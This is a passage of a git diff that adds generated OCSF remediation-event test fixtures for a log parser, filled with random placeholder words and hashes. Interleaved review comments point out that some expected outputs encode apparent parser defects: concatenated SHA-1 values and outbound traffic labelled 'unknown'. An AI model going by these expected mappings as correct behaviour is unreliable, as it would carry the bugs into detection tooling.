\"95fcdc6c-a029-11ef-acb7-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"95fc9ff4-a029-11ef-8605-0242ac110007\"}, \"d3f_technique\": {\"name\": \"determine wanting pursuant\"}}, {\"version\": 
\"1.3.0\", \"d3f_tactic\": {\"uid\": \"95fcb016-a029-11ef-9ed4-0242ac110007\"}, \"d3f_technique\": {\"name\": \"cw drama their\", \"uid\": \"95fcbd7c-a029-11ef-ba3c-0242ac110007\", \"src_url\": \"organize\"}}], \"enrichments\": [{\"data\": \"cluster\", \"name\": \"settlement ia sega\", \"type\": \"surfaces registrar sizes\", \"value\": \"seq excuse nearest\", \"created_time\": 1731328594225, \"provider\": \"lesson prev champion\", \"reputation\": {\"base_score\": 15.2963, \"provider\": \"northern prep older\", \"score\": \"May not be Safe\", \"score_id\": 5}, \"short_desc\": \"travel glasses agencies\", \"src_url\": \"fly\"}, {\"data\": \"mpegs\", \"name\": \"mentor glasgow mistress\", \"type\": \"email newest household\", \"value\": \"vpn tape med\", \"created_time\": 1731328594225, \"short_desc\": \"anything fatty capital\", \"src_url\": \"saint\"}], \"severity_id\": 99, \"status_detail\": \"mistake schedule propecia\", \"status_id\": 3}" + }, + "expected": { + "message": "{\"status\": \"Does Not Exist\", \"time\": 1731328594225, \"file\": {\"name\": \"html.pkg\", \"type\": \"Local Socket\", \"version\": \"1.3.0\", \"path\": \"canyon upgrading wool/marco.fla/html.pkg\", \"ext\": \"honest borough graduated\", \"type_id\": 5, \"mime_type\": \"pr/anything\", \"parent_folder\": \"canyon upgrading wool/marco.fla\", \"confidentiality\": \"prisoner fought submission\", \"hashes\": [{\"value\": \"BDD5C7FF933889BB4DE51943D295A2C3BF3CCE0EE5D7196DB36A7B734E44B9478FE798F4A6E72C0FB13B30746C0434F713614EBDB498B03029382CF837E23878\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"xattributes\": {}}, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"older bangladesh caused\", \"version\": \"1.3.0\", \"lang\": \"en\", \"cpe_name\": \"m ryan proof\", \"url_string\": \"web\", \"vendor_name\": \"directed villas incorrect\"}, \"labels\": [\"range\", \"mild\"], \"profiles\": [], \"event_code\": \"ethnic\", \"log_name\": \"wisconsin scenes croatia\", \"log_provider\": 
\"consolidated month mil\", \"logged_time\": 1731328594209, \"loggers\": [{\"name\": \"generated dale subsection\", \"version\": \"1.3.0\", \"device\": {\"owner\": {\"name\": \"Chapter\", \"type\": \"User\", \"uid\": \"95fb04dc-a029-11ef-9566-0242ac110007\", \"type_id\": 1, \"risk_level\": \"Info\", \"risk_level_id\": 0}, \"type\": \"IOT\", \"os\": {\"name\": \"polls knew problem\", \"type\": \"Windows\", \"type_id\": 100, \"cpe_name\": \"architects letting hay\"}, \"desc\": \"tradition automated mysql\", \"hostname\": \"meters.edu\", \"uid\": \"95faf0a0-a029-11ef-a3c0-0242ac110007\", \"image\": {\"name\": \"ace tracy webshots\", \"path\": \"joined also europe\", \"uid\": \"95fbbb16-a029-11ef-9965-0242ac110007\"}, \"groups\": [{\"uid\": \"95faa5fa-a029-11ef-b64e-0242ac110007\"}], \"type_id\": 7, \"imei\": \"summary ieee rated\", \"interface_name\": \"marsh shopper guides\", \"interface_uid\": \"95fa9074-a029-11ef-931d-0242ac110007\", \"region\": \"accepting sword tab\", \"risk_level\": \"High\", \"risk_level_id\": 3, \"risk_score\": 4, \"zone\": \"ability footage nt\"}, \"product\": {\"name\": \"quote licence channel\", \"version\": \"1.3.0\", \"uid\": \"95fc351e-a029-11ef-87b2-0242ac110007\", \"feature\": {\"name\": \"adequate drainage dear\", \"version\": \"1.3.0\", \"uid\": \"95fc4cd4-a029-11ef-9a35-0242ac110007\"}, \"url_string\": \"makes\", \"vendor_name\": \"hybrid licensing faster\"}, \"uid\": \"95fc5602-a029-11ef-9902-0242ac110007\", \"log_name\": \"vegas cave greatly\", \"log_provider\": \"ieee cancer pharmaceuticals\", \"logged_time\": 1731328594222}, {\"name\": \"hostels given kill\", \"version\": \"1.3.0\", \"product\": {\"name\": \"css ks demonstrate\", \"version\": \"1.3.0\", \"uid\": \"95fc6b06-a029-11ef-b5a5-0242ac110007\", \"lang\": \"en\", \"url_string\": \"alternatives\", \"vendor_name\": \"television preventing blades\"}, \"uid\": \"95fc72c2-a029-11ef-994a-0242ac110007\", \"log_provider\": \"alignment free mines\", \"logged_time\": 
1731328594222}], \"original_time\": \"drill blogs lemon\", \"processed_time\": 1731328594222, \"tenant_uid\": \"95fc7d12-a029-11ef-bfaa-0242ac110007\"}, \"severity\": \"illustrations\", \"duration\": 559843632, \"category_uid\": 7, \"activity_id\": 2, \"type_uid\": 700202, \"type_name\": \"File Remediation Activity: Evict\", \"observables\": [{\"name\": \"chen architects purchased\", \"type\": \"File\", \"type_id\": 24}, {\"name\": \"controlling sublime bp\", \"type\": \"URL String\", \"type_id\": 6}], \"category_name\": \"Remediation\", \"class_uid\": 7002, \"class_name\": \"File Remediation Activity\", \"timezone_offset\": 58, \"activity_name\": \"Evict\", \"command_uid\": \"95fcdc6c-a029-11ef-acb7-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"95fc9ff4-a029-11ef-8605-0242ac110007\"}, \"d3f_technique\": {\"name\": \"determine wanting pursuant\"}}, {\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"95fcb016-a029-11ef-9ed4-0242ac110007\"}, \"d3f_technique\": {\"name\": \"cw drama their\", \"uid\": \"95fcbd7c-a029-11ef-ba3c-0242ac110007\", \"src_url\": \"organize\"}}], \"enrichments\": [{\"data\": \"cluster\", \"name\": \"settlement ia sega\", \"type\": \"surfaces registrar sizes\", \"value\": \"seq excuse nearest\", \"created_time\": 1731328594225, \"provider\": \"lesson prev champion\", \"reputation\": {\"base_score\": 15.2963, \"provider\": \"northern prep older\", \"score\": \"May not be Safe\", \"score_id\": 5}, \"short_desc\": \"travel glasses agencies\", \"src_url\": \"fly\"}, {\"data\": \"mpegs\", \"name\": \"mentor glasgow mistress\", \"type\": \"email newest household\", \"value\": \"vpn tape med\", \"created_time\": 1731328594225, \"short_desc\": \"anything fatty capital\", \"src_url\": \"saint\"}], \"severity_id\": 99, \"status_detail\": \"mistake schedule propecia\", \"status_id\": 3}", + "event": { + "action": "evict", + "category": [], + "code": "ethnic", + "duration": 559843632000000, + "provider": 
"consolidated month mil", + "severity": 99, + "type": [] + }, + "@timestamp": "2024-11-11T12:36:34.225000Z", + "file": { + "directory": "canyon upgrading wool/marco.fla", + "hash": { + "ssdeep": "BDD5C7FF933889BB4DE51943D295A2C3BF3CCE0EE5D7196DB36A7B734E44B9478FE798F4A6E72C0FB13B30746C0434F713614EBDB498B03029382CF837E23878" + }, + "mime_type": "pr/anything", + "name": "html.pkg", + "path": "canyon upgrading wool/marco.fla/html.pkg", + "type": "Local Socket" + }, + "ocsf": { + "activity_id": 2, + "activity_name": "Evict", + "class_name": "File Remediation Activity", + "class_uid": 7002 + }, + "related": { + "hash": [ + "BDD5C7FF933889BB4DE51943D295A2C3BF3CCE0EE5D7196DB36A7B734E44B9478FE798F4A6E72C0FB13B30746C0434F713614EBDB498B03029382CF837E23878" + ] + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/generated_file_remediation_activity_2.json b/OCSF/ocsf/tests/generated_file_remediation_activity_2.json new file mode 100644 index 000000000..9af77e1ab --- /dev/null +++ b/OCSF/ocsf/tests/generated_file_remediation_activity_2.json 
@@ -0,0 +1,39 @@ +{ + "input": { + "message": "{\"message\": \"oils tissue non\", \"status\": \"bottle threads desktop\", \"time\": 1731328621430, \"file\": {\"attributes\": 77, \"name\": \"panama.jsp\", \"type\": \"Unknown\", \"version\": \"1.3.0\", \"path\": \"sage petite tracy/supplement.deskthemepack/panama.jsp\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"issuer\": \"shaw further heaven\", \"fingerprints\": [{\"value\": \"25CF2FBFB6A4C58B9886BFD82A9D9D32976450F5B95B193B1F8F91071FCE9032\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"created_time\": 1731328621426, \"expiration_time\": 1731328621426, \"serial_number\": \"museum every fa\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, \"desc\": \"sims faculty argue\", \"uid\": \"a6338964-a029-11ef-9cb6-0242ac110007\", \"type_id\": 0, \"parent_folder\": \"sage petite tracy/supplement.deskthemepack\", \"accessed_time\": 1731328621427, \"hashes\": [{\"value\": \"1051E22C1288CD1DD4B35D7D119F9D9E764B37C2050E8086C3F8AADBE48E8459\", \"algorithm\": \"magic\", \"algorithm_id\": 99}, {\"value\": \"2A598E60AFB25F3005C1949A4AE28E75A5E24C34375D709852748D46D50E19DBF4AD93722613E77084B214B0C8F931F2EFF7B1AA9AF17B97F3D50770D0C328DB\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"xattributes\": {}}, \"metadata\": {\"version\": \"1.3.0\", \"extension\": {\"name\": \"determine italia plenty\", \"version\": \"1.3.0\", \"uid\": \"a6331254-a029-11ef-a2ea-0242ac110007\"}, \"product\": {\"name\": \"board actor feels\", \"version\": \"1.3.0\", \"uid\": \"a6334788-a029-11ef-8ba2-0242ac110007\", \"vendor_name\": \"resume himself vitamin\"}, \"uid\": \"a63350e8-a029-11ef-91d8-0242ac110007\", \"profiles\": [], \"correlation_uid\": \"a63357c8-a029-11ef-a1d1-0242ac110007\", \"log_name\": \"movements amazing murphy\", \"log_provider\": \"suggests assure sacred\", \"original_time\": \"narrative shed quit\", \"tenant_uid\": \"a63361a0-a029-11ef-b41a-0242ac110007\"}, \"severity\": 
\"Medium\", \"category_uid\": 7, \"activity_id\": 4, \"type_uid\": 700204, \"type_name\": \"File Remediation Activity: Harden\", \"observables\": [{\"name\": \"font earlier construction\", \"type\": \"Hash\", \"type_id\": 8}, {\"name\": \"outdoors de otherwise\", \"type\": \"Unknown\", \"type_id\": 0}], \"category_name\": \"Remediation\", \"class_uid\": 7002, \"class_name\": \"File Remediation Activity\", \"timezone_offset\": 94, \"activity_name\": \"Harden\", \"command_uid\": \"a6340542-a029-11ef-ab83-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"a633df68-a029-11ef-b6df-0242ac110007\"}, \"d3f_technique\": {\"name\": \"tgp adrian reject\", \"uid\": \"a633ef26-a029-11ef-ae66-0242ac110007\", \"src_url\": \"productions\"}}], \"severity_id\": 3, \"status_code\": \"lover\", \"status_detail\": \"declared chassis nominations\"}" + }, + "expected": { + "message": "{\"message\": \"oils tissue non\", \"status\": \"bottle threads desktop\", \"time\": 1731328621430, \"file\": {\"attributes\": 77, \"name\": \"panama.jsp\", \"type\": \"Unknown\", \"version\": \"1.3.0\", \"path\": \"sage petite tracy/supplement.deskthemepack/panama.jsp\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"issuer\": \"shaw further heaven\", \"fingerprints\": [{\"value\": \"25CF2FBFB6A4C58B9886BFD82A9D9D32976450F5B95B193B1F8F91071FCE9032\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"created_time\": 1731328621426, \"expiration_time\": 1731328621426, \"serial_number\": \"museum every fa\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, \"desc\": \"sims faculty argue\", \"uid\": \"a6338964-a029-11ef-9cb6-0242ac110007\", \"type_id\": 0, \"parent_folder\": \"sage petite tracy/supplement.deskthemepack\", \"accessed_time\": 1731328621427, \"hashes\": [{\"value\": \"1051E22C1288CD1DD4B35D7D119F9D9E764B37C2050E8086C3F8AADBE48E8459\", \"algorithm\": \"magic\", \"algorithm_id\": 99}, {\"value\": 
\"2A598E60AFB25F3005C1949A4AE28E75A5E24C34375D709852748D46D50E19DBF4AD93722613E77084B214B0C8F931F2EFF7B1AA9AF17B97F3D50770D0C328DB\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"xattributes\": {}}, \"metadata\": {\"version\": \"1.3.0\", \"extension\": {\"name\": \"determine italia plenty\", \"version\": \"1.3.0\", \"uid\": \"a6331254-a029-11ef-a2ea-0242ac110007\"}, \"product\": {\"name\": \"board actor feels\", \"version\": \"1.3.0\", \"uid\": \"a6334788-a029-11ef-8ba2-0242ac110007\", \"vendor_name\": \"resume himself vitamin\"}, \"uid\": \"a63350e8-a029-11ef-91d8-0242ac110007\", \"profiles\": [], \"correlation_uid\": \"a63357c8-a029-11ef-a1d1-0242ac110007\", \"log_name\": \"movements amazing murphy\", \"log_provider\": \"suggests assure sacred\", \"original_time\": \"narrative shed quit\", \"tenant_uid\": \"a63361a0-a029-11ef-b41a-0242ac110007\"}, \"severity\": \"Medium\", \"category_uid\": 7, \"activity_id\": 4, \"type_uid\": 700204, \"type_name\": \"File Remediation Activity: Harden\", \"observables\": [{\"name\": \"font earlier construction\", \"type\": \"Hash\", \"type_id\": 8}, {\"name\": \"outdoors de otherwise\", \"type\": \"Unknown\", \"type_id\": 0}], \"category_name\": \"Remediation\", \"class_uid\": 7002, \"class_name\": \"File Remediation Activity\", \"timezone_offset\": 94, \"activity_name\": \"Harden\", \"command_uid\": \"a6340542-a029-11ef-ab83-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"a633df68-a029-11ef-b6df-0242ac110007\"}, \"d3f_technique\": {\"name\": \"tgp adrian reject\", \"uid\": \"a633ef26-a029-11ef-ae66-0242ac110007\", \"src_url\": \"productions\"}}], \"severity_id\": 3, \"status_code\": \"lover\", \"status_detail\": \"declared chassis nominations\"}", + "event": { + "action": "harden", + "category": [], + "provider": "suggests assure sacred", + "reason": "oils tissue non", + "severity": 3, + "type": [] + }, + "@timestamp": "2024-11-11T12:37:01.430000Z", + "file": { + 
"accessed": "2024-11-11T12:37:01.427000Z", + "directory": "sage petite tracy/supplement.deskthemepack", + "inode": "a6338964-a029-11ef-9cb6-0242ac110007", + "name": "panama.jsp", + "path": "sage petite tracy/supplement.deskthemepack/panama.jsp", + "type": "Unknown", + "x509": { + "issuer": { + "distinguished_name": "shaw further heaven" + }, + "not_after": "2024-11-11T12:37:01.426000Z", + "serial_number": "museum every fa", + "version_number": "1.3.0" + } + }, + "ocsf": { + "activity_id": 4, + "activity_name": "Harden", + "class_name": "File Remediation Activity", + "class_uid": 7002 + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/generated_file_remediation_activity_3.json b/OCSF/ocsf/tests/generated_file_remediation_activity_3.json new file mode 100644 index 000000000..35f27d49f --- /dev/null +++ b/OCSF/ocsf/tests/generated_file_remediation_activity_3.json 
@@ -0,0 +1,43 @@ +{ + "input": { + "message": "{\"message\": \"baker testimonials approx\", \"status\": \"Error\", \"time\": 1731328627583, \"file\": {\"attributes\": 65, \"name\": \"brazilian.tar.gz\", \"owner\": {\"name\": \"Enrolled\", \"type\": \"Unknown\", \"uid\": \"a9de1552-a029-11ef-9be5-0242ac110007\", \"type_id\": 0, \"credential_uid\": \"a9de21c8-a029-11ef-a4ce-0242ac110007\", \"uid_alt\": \"camel license fl\"}, \"type\": \"Regular File\", \"path\": \"violin economic czech/regular.accdb/brazilian.tar.gz\", \"product\": {\"name\": \"just philippines startup\", \"version\": \"1.3.0\", \"uid\": \"a9de4ec8-a029-11ef-96ee-0242ac110007\", \"feature\": {\"name\": \"metro municipality egypt\", \"version\": \"1.3.0\", \"uid\": \"a9de59f4-a029-11ef-8d34-0242ac110007\"}, \"cpe_name\": \"highly os treated\", \"vendor_name\": \"candidates etc beverage\"}, \"ext\": \"labels oriental websites\", \"type_id\": 1, \"creator\": {\"name\": \"Templates\", \"uid\": \"a9deb516-a029-11ef-8430-0242ac110007\", \"org\": {\"name\": \"welfare philip fathers\", \"uid\": \"a9dec100-a029-11ef-986c-0242ac110007\", \"ou_name\": \"threat supporting pension\"}, \"email_addr\": \"Tabetha@programmers.arpa\"}, \"mime_type\": \"agree/diego\", \"parent_folder\": \"violin economic czech/regular.accdb\", \"hashes\": [{\"value\": \"23BF00BD8ADB4469651EB5D5C47027D49C53BB2D\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"4F80D2DFFF57658A1076FF2F74282A97BB0B6574\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}], \"xattributes\": {}}, \"metadata\": {\"version\": \"1.3.0\", \"extension\": {\"name\": \"conventional indexes merit\", \"version\": \"1.3.0\", \"uid\": \"a9dc7224-a029-11ef-ae98-0242ac110007\"}, \"product\": {\"name\": \"zimbabwe meals purchase\", \"version\": \"1.3.0\", \"uid\": \"a9dcfdac-a029-11ef-aa8a-0242ac110007\", \"vendor_name\": \"status hole consider\"}, \"profiles\": [], \"log_name\": \"attorney destinations evolution\", \"log_provider\": \"sections sides 
trembl\", \"modified_time\": 1731328627575, \"original_time\": \"coalition polyphonic limit\", \"tenant_uid\": \"a9ddd8d0-a029-11ef-a422-0242ac110007\"}, \"scan\": {\"name\": \"nd lawn seeking\", \"type\": \"Updated Content\", \"uid\": \"a9ddf644-a029-11ef-b1ea-0242ac110007\", \"type_id\": 3}, \"severity\": \"Unknown\", \"category_uid\": 7, \"activity_id\": 2, \"type_uid\": 700202, \"type_name\": \"File Remediation Activity: Evict\", \"category_name\": \"Remediation\", \"class_uid\": 7002, \"class_name\": \"File Remediation Activity\", \"activity_name\": \"Evict\", \"command_uid\": \"a9deee3c-a029-11ef-8d19-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"a9ded82a-a029-11ef-9aed-0242ac110007\"}, \"d3f_technique\": {\"name\": \"collecting monte craps\", \"uid\": \"a9dee1da-a029-11ef-b734-0242ac110007\"}}], \"severity_id\": 0, \"status_code\": \"holes\", \"status_detail\": \"payroll perfectly prospective\", \"status_id\": 6}" + }, + "expected": { + "message": "{\"message\": \"baker testimonials approx\", \"status\": \"Error\", \"time\": 1731328627583, \"file\": {\"attributes\": 65, \"name\": \"brazilian.tar.gz\", \"owner\": {\"name\": \"Enrolled\", \"type\": \"Unknown\", \"uid\": \"a9de1552-a029-11ef-9be5-0242ac110007\", \"type_id\": 0, \"credential_uid\": \"a9de21c8-a029-11ef-a4ce-0242ac110007\", \"uid_alt\": \"camel license fl\"}, \"type\": \"Regular File\", \"path\": \"violin economic czech/regular.accdb/brazilian.tar.gz\", \"product\": {\"name\": \"just philippines startup\", \"version\": \"1.3.0\", \"uid\": \"a9de4ec8-a029-11ef-96ee-0242ac110007\", \"feature\": {\"name\": \"metro municipality egypt\", \"version\": \"1.3.0\", \"uid\": \"a9de59f4-a029-11ef-8d34-0242ac110007\"}, \"cpe_name\": \"highly os treated\", \"vendor_name\": \"candidates etc beverage\"}, \"ext\": \"labels oriental websites\", \"type_id\": 1, \"creator\": {\"name\": \"Templates\", \"uid\": \"a9deb516-a029-11ef-8430-0242ac110007\", \"org\": {\"name\": 
\"welfare philip fathers\", \"uid\": \"a9dec100-a029-11ef-986c-0242ac110007\", \"ou_name\": \"threat supporting pension\"}, \"email_addr\": \"Tabetha@programmers.arpa\"}, \"mime_type\": \"agree/diego\", \"parent_folder\": \"violin economic czech/regular.accdb\", \"hashes\": [{\"value\": \"23BF00BD8ADB4469651EB5D5C47027D49C53BB2D\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"4F80D2DFFF57658A1076FF2F74282A97BB0B6574\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}], \"xattributes\": {}}, \"metadata\": {\"version\": \"1.3.0\", \"extension\": {\"name\": \"conventional indexes merit\", \"version\": \"1.3.0\", \"uid\": \"a9dc7224-a029-11ef-ae98-0242ac110007\"}, \"product\": {\"name\": \"zimbabwe meals purchase\", \"version\": \"1.3.0\", \"uid\": \"a9dcfdac-a029-11ef-aa8a-0242ac110007\", \"vendor_name\": \"status hole consider\"}, \"profiles\": [], \"log_name\": \"attorney destinations evolution\", \"log_provider\": \"sections sides trembl\", \"modified_time\": 1731328627575, \"original_time\": \"coalition polyphonic limit\", \"tenant_uid\": \"a9ddd8d0-a029-11ef-a422-0242ac110007\"}, \"scan\": {\"name\": \"nd lawn seeking\", \"type\": \"Updated Content\", \"uid\": \"a9ddf644-a029-11ef-b1ea-0242ac110007\", \"type_id\": 3}, \"severity\": \"Unknown\", \"category_uid\": 7, \"activity_id\": 2, \"type_uid\": 700202, \"type_name\": \"File Remediation Activity: Evict\", \"category_name\": \"Remediation\", \"class_uid\": 7002, \"class_name\": \"File Remediation Activity\", \"activity_name\": \"Evict\", \"command_uid\": \"a9deee3c-a029-11ef-8d19-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"a9ded82a-a029-11ef-9aed-0242ac110007\"}, \"d3f_technique\": {\"name\": \"collecting monte craps\", \"uid\": \"a9dee1da-a029-11ef-b734-0242ac110007\"}}], \"severity_id\": 0, \"status_code\": \"holes\", \"status_detail\": \"payroll perfectly prospective\", \"status_id\": 6}", + "event": { + "action": "evict", + "category": [], + 
"provider": "sections sides trembl", + "reason": "baker testimonials approx", + "severity": 0, + "type": [] + }, + "@timestamp": "2024-11-11T12:37:07.583000Z", + "file": { + "directory": "violin economic czech/regular.accdb", + "hash": { + "sha1": "23BF00BD8ADB4469651EB5D5C47027D49C53BB2D4F80D2DFFF57658A1076FF2F74282A97BB0B6574" + }, + "mime_type": "agree/diego", + "name": "brazilian.tar.gz", + "owner": "Enrolled", + "path": "violin economic czech/regular.accdb/brazilian.tar.gz", + "type": "Regular File", + "uid": "a9de1552-a029-11ef-9be5-0242ac110007" + }, + "ocsf": { + "activity_id": 2, + "activity_name": "Evict", + "class_name": "File Remediation Activity", + "class_uid": 7002 + }, + "related": { + "hash": [ + "23BF00BD8ADB4469651EB5D5C47027D49C53BB2D4F80D2DFFF57658A1076FF2F74282A97BB0B6574" + ], + "user": [ + "Enrolled" + ] + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/generated_network_remediation_activity_1.json b/OCSF/ocsf/tests/generated_network_remediation_activity_1.json new file mode 100644 index 000000000..4209eb1be --- /dev/null +++ b/OCSF/ocsf/tests/generated_network_remediation_activity_1.json 
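Review bot: The expected `file.hash.sha1` in this fixture is an 80-hex-character string, which is the two SHA-1 values from the input `hashes` array (`23BF…BB2D` and `4F80…6574`) concatenated, not a SHA-1 digest; `related.hash` carries the same joined value. A fixture that asserts this locks in what looks like a parser defect when several entries share an `algorithm_id`, and the resulting value will never match a real SHA-1 indicator in a lookup or rule. The expectation should be a single 40-hex digest, e.g. `"sha1": "23BF00BD8ADB4469651EB5D5C47027D49C53BB2D"`, with `related.hash` listing each input value as its own element, and the parser (not visible here) changed to take the first value per algorithm or to emit a list rather than joining strings.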
@@ -0,0 +1,29 @@ +{ + "input": { + "message": "{\"message\": \"kills routine cookie\", \"status\": \"Error\", \"time\": 1731331184401, \"metadata\": {\"version\": \"1.3.0\", \"extension\": {\"name\": \"consoles paste democrats\", \"version\": \"1.3.0\", \"uid\": \"9dd714a6-a02f-11ef-a375-0242ac110007\"}, \"product\": {\"name\": \"strip milton message\", \"uid\": \"9dd78440-a02f-11ef-9b45-0242ac110007\", \"feature\": {\"name\": \"dealing instruction glasgow\", \"version\": \"1.3.0\", \"uid\": \"9dd7bc30-a02f-11ef-a841-0242ac110007\"}, \"vendor_name\": \"praise profit voyeurweb\"}, \"uid\": \"9dd80514-a02f-11ef-ad38-0242ac110007\", \"profiles\": [], \"log_name\": \"mens coverage sustained\", \"log_provider\": \"expertise browse courier\", \"logged_time\": 1731331184386, \"original_time\": \"sauce female resulted\", \"tenant_uid\": \"9dd8901a-a02f-11ef-b542-0242ac110007\"}, \"connection_info\": {\"uid\": \"9dd8e524-a02f-11ef-a212-0242ac110007\", \"boundary\": \"Unknown\", \"protocol_name\": \"notion expressed postcards\", \"direction\": \"Outbound\", \"boundary_id\": 0, \"direction_id\": 2, \"protocol_num\": 62, \"protocol_ver\": \"pricing\", \"protocol_ver_id\": 99, \"tcp_flags\": 39}, \"severity\": \"High\", \"category_uid\": 7, \"activity_id\": 3, \"type_uid\": 700403, \"type_name\": \"Network Remediation Activity: Restore\", \"observables\": [{\"name\": \"pricing pope defendant\", \"type\": \"Process Name\", \"type_id\": 9}, {\"name\": \"fail long monthly\", \"type\": \"Resource UID\", \"type_id\": 10, \"reputation\": {\"base_score\": 5.3863, \"provider\": \"finally responding daughter\", \"score\": \"Probably Safe\", \"score_id\": 3}}], \"category_name\": \"Remediation\", \"class_uid\": 7004, \"class_name\": \"Network Remediation Activity\", \"timezone_offset\": 79, \"activity_name\": \"Restore\", \"command_uid\": \"9ddaa616-a02f-11ef-bdaf-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": 
\"9dd9bdc8-a02f-11ef-a7a3-0242ac110007\"}, \"d3f_technique\": {\"name\": \"informal statistics lcd\", \"uid\": \"9dda024c-a02f-11ef-938d-0242ac110007\"}}], \"severity_id\": 4, \"status_code\": \"cds\", \"status_id\": 6}" + }, + "expected": { + "message": "{\"message\": \"kills routine cookie\", \"status\": \"Error\", \"time\": 1731331184401, \"metadata\": {\"version\": \"1.3.0\", \"extension\": {\"name\": \"consoles paste democrats\", \"version\": \"1.3.0\", \"uid\": \"9dd714a6-a02f-11ef-a375-0242ac110007\"}, \"product\": {\"name\": \"strip milton message\", \"uid\": \"9dd78440-a02f-11ef-9b45-0242ac110007\", \"feature\": {\"name\": \"dealing instruction glasgow\", \"version\": \"1.3.0\", \"uid\": \"9dd7bc30-a02f-11ef-a841-0242ac110007\"}, \"vendor_name\": \"praise profit voyeurweb\"}, \"uid\": \"9dd80514-a02f-11ef-ad38-0242ac110007\", \"profiles\": [], \"log_name\": \"mens coverage sustained\", \"log_provider\": \"expertise browse courier\", \"logged_time\": 1731331184386, \"original_time\": \"sauce female resulted\", \"tenant_uid\": \"9dd8901a-a02f-11ef-b542-0242ac110007\"}, \"connection_info\": {\"uid\": \"9dd8e524-a02f-11ef-a212-0242ac110007\", \"boundary\": \"Unknown\", \"protocol_name\": \"notion expressed postcards\", \"direction\": \"Outbound\", \"boundary_id\": 0, \"direction_id\": 2, \"protocol_num\": 62, \"protocol_ver\": \"pricing\", \"protocol_ver_id\": 99, \"tcp_flags\": 39}, \"severity\": \"High\", \"category_uid\": 7, \"activity_id\": 3, \"type_uid\": 700403, \"type_name\": \"Network Remediation Activity: Restore\", \"observables\": [{\"name\": \"pricing pope defendant\", \"type\": \"Process Name\", \"type_id\": 9}, {\"name\": \"fail long monthly\", \"type\": \"Resource UID\", \"type_id\": 10, \"reputation\": {\"base_score\": 5.3863, \"provider\": \"finally responding daughter\", \"score\": \"Probably Safe\", \"score_id\": 3}}], \"category_name\": \"Remediation\", \"class_uid\": 7004, \"class_name\": \"Network Remediation Activity\", 
\"timezone_offset\": 79, \"activity_name\": \"Restore\", \"command_uid\": \"9ddaa616-a02f-11ef-bdaf-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"9dd9bdc8-a02f-11ef-a7a3-0242ac110007\"}, \"d3f_technique\": {\"name\": \"informal statistics lcd\", \"uid\": \"9dda024c-a02f-11ef-938d-0242ac110007\"}}], \"severity_id\": 4, \"status_code\": \"cds\", \"status_id\": 6}", + "event": { + "action": "restore", + "category": [], + "provider": "expertise browse courier", + "reason": "kills routine cookie", + "severity": 4, + "type": [] + }, + "@timestamp": "2024-11-11T13:19:44.401000Z", + "network": { + "direction": [ + "unknown" + ], + "iana_number": "62" + }, + "ocsf": { + "activity_id": 3, + "activity_name": "Restore", + "class_name": "Network Remediation Activity", + "class_uid": 7004 + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/generated_network_remediation_activity_2.json b/OCSF/ocsf/tests/generated_network_remediation_activity_2.json new file mode 100644 index 000000000..afc4afcbe --- /dev/null +++ b/OCSF/ocsf/tests/generated_network_remediation_activity_2.json 
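Review bot: The expected `network.direction` here is `["unknown"]` although the input carries `"direction": "Outbound"` with `direction_id: 2`, while the sibling fixture for `direction_id: 1` expects `["inbound"]`; this suggests the outbound case is missing from the parser's direction mapping and the fixture is asserting the gap rather than the intended value. For detection content that keys on egress (for example C2 beaconing or exfiltration rules), an outbound remediation event silently reported as unknown direction is a blind spot. The expected value should be `"direction": ["outbound"]`, with the parser's `direction_id` mapping (not visible in this diff) extended accordingly, and `["unknown"]` reserved for `direction_id: 0` or an absent field.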
@@ -0,0 +1,30 @@ +{ + "input": { + "message": "{\"count\": 70, \"message\": \"virtue carb keeps\", \"status\": \"Unknown\", \"time\": 1731331194181, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"subjective myself systems\", \"version\": \"1.3.0\", \"uid\": \"a3ac922a-a02f-11ef-984c-0242ac110007\", \"feature\": {\"name\": \"seafood zen attacks\", \"version\": \"1.3.0\", \"uid\": \"a3ad2ca8-a02f-11ef-a741-0242ac110007\"}, \"vendor_name\": \"sullivan participation wired\"}, \"extensions\": [{\"name\": \"faq valuable theory\", \"version\": \"1.3.0\", \"uid\": \"a3ad55ac-a02f-11ef-9d32-0242ac110007\"}, {\"name\": \"diesel salmon graduates\", \"version\": \"1.3.0\", \"uid\": \"a3ad70e6-a02f-11ef-be20-0242ac110007\"}], \"profiles\": [], \"log_name\": \"influence increasing towers\", \"log_provider\": \"defence ignore carroll\", \"original_time\": \"baths ends led\", \"tenant_uid\": \"a3ad8d56-a02f-11ef-a66b-0242ac110007\"}, \"scan\": {\"name\": \"fits educated vip\", \"type\": \"Attached 